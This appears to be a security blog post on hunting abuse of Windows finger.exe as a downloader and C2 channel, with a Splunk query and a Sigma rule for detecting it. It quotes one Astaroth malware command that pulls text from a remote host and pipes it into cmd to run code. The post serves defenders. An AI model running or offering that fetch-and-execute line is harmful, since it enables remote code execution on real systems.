Finger.exe is designed for a local user to retrieve a list of users on a remote machine or information about a particular remote user. Attackers can use this binary as a file downloader and C2 channel to evade defenses and hide malicious activities used in Living Of The Land attacks (Lolbas). In recent analysis, we also found that operators of the Astaroth malware, also called Guildma, started using this binary in their attacks to execute remote malicious code from the initial payload of the threat.
Here is an example of a command executed on the new Astaroth malware payloads:
“finger.exe user@server.xyz|more +2 | cmd”
Hunting for suspicious activities with finger.exe
Typically, the FINGER protocol uses the standard port (79) that organizations often block. However, it is essential to monitor for suspicious activity, mainly due to recent malware usage.
Below is a simple Splunk Rule, Sigma Rule, followed by mapping via Mitre Attack® technique to help the security community identify finger.exe in the environment.
Possible Splunk Rule:
index=(your index) EventID=1 (finger (Image=C:\\Windows\\System32\\finger.exe) CommandLine=”*@*”)
| stats count by Computer User EventID CommandLine ImageSigma Rule
title: Lolbas Windows Finger.exe
description: Detects suspicious activities when Finger.exe (legitimate Windows binary) is used for file downloads, or attempts to communicate with C2 channels.
tags:
* attack.defense_evasion
* attack.Signed Binary Proxy Execution
* attack.T1218
* MitreLink: https://attack.mitre.org/techniques/T1218/
status: experimental
author: Keilly Santos
date: 2021/02/08
modified: 2021/02/08
logsource:
product: windows
service: sysmon
detection:
selection:
EventID: 1
Image | endswith: finger.exe
CommandLine | contain: *@*
condition: selection
falsepositives: unknown
level: high
references:
http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt
https://www.bleepingcomputer.com/news/security/windows-10-finger-command-can-be-abused-to-download-or-steal-files/
https://hackunagi.medium.com/astaroth-guildma-the-latam-trojan-with-several-faces-1e350806223e
https://attack.mitre.org/techniques/T1218/
Hope it helps.
Happy hunting! =D
